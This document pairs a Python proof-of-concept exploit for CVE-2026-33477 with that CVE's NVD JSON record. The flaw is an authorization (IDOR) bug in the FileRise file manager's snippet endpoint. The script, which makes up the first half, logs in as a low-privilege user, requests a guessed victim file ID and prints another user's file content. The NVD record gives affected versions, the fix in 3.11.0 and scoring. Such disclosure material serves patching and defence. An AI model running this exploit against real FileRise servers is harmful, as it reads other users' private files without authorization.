CVE-2026-33477

import requests # Target configuration target_host = "http://filerise.example.com" vulnerable_endpoint = "/api/file/snippet.php" # Attacker's credentials (low privilege user) username = "attacker" password = "password" # 1. Authenticate to get a valid session session = requests.Session() login_payload = { "username": username, "password": password } login_resp = session.post(f"{target_host}/api/login.php", data=login_payload) if login_resp.status_code != 200: print("Login failed") exit(1) # 2. Identify a target file ID belonging to another user in the same folder # This ID might be guessed or enumerated victim_file_id = "45" # 3. Exploit the IDOR vulnerability exploit_payload = { "file_id": victim_file_id, "action": "get_snippet" } response = session.post(f"{target_host}{vulnerable_endpoint}", data=exploit_payload) if response.status_code == 200: print("[+] Exploit Successful!") print("[+] Snippet content:") print(response.text) else: print("[-] Exploit Failed") print(f"Status Code: {response.status_code}")

{"cve": {"id": "CVE-2026-33477", "sourceIdentifier": "[email protected]", "published": "2026-03-26T18:16:29.580", "lastModified": "2026-03-31T12:38:12.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FileRise is a self-hosted web-based file manager with multi-file upload, editing, and batch operations. In versiosn 2.3.7 through 3.10.0, the file snippet endpoint `/api/file/snippet.php` allows an authenticated user with only `read_own` access to a folder to retrieve snippet content from files uploaded by other users in the same folder. This is a server-side authorization flaw in the `read_own` enforcement for hover previews. Version 3.11.0 fixes the issue."}, {"lang": "es", "value": "FileRise es un gestor de archivos autohospedado basado en web con carga de múltiples archivos, edición y operaciones por lotes. En las versiones 2.3.7 a la 3.10.0, el endpoint de fragmentos de archivo `/api/file/snippet.php` permite a un usuario autenticado con solo acceso 'read_own' a una carpeta recuperar contenido de fragmentos de archivos subidos por otros usuarios en la misma carpeta. Esto es una falla de autorización del lado del servidor en la aplicación de 'read_own' para las vistas previas al pasar el ratón. La versión 3.11.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filerise:filerise:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.7", "versionEndExcluding": "3.11.0", "matchCriteriaId": "51D0BB82-B0E1-4A29-9C51-EA8DAE58105A"}]}]}], "references": [{"url": "https://github.com/error311/FileRise/releases/tag/v3.11.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/error311/FileRise/security/advisories/GHSA-62wx-vp78-2p83", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/error311/FileRise/security/advisories/GHSA-62wx-vp78-2p83", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}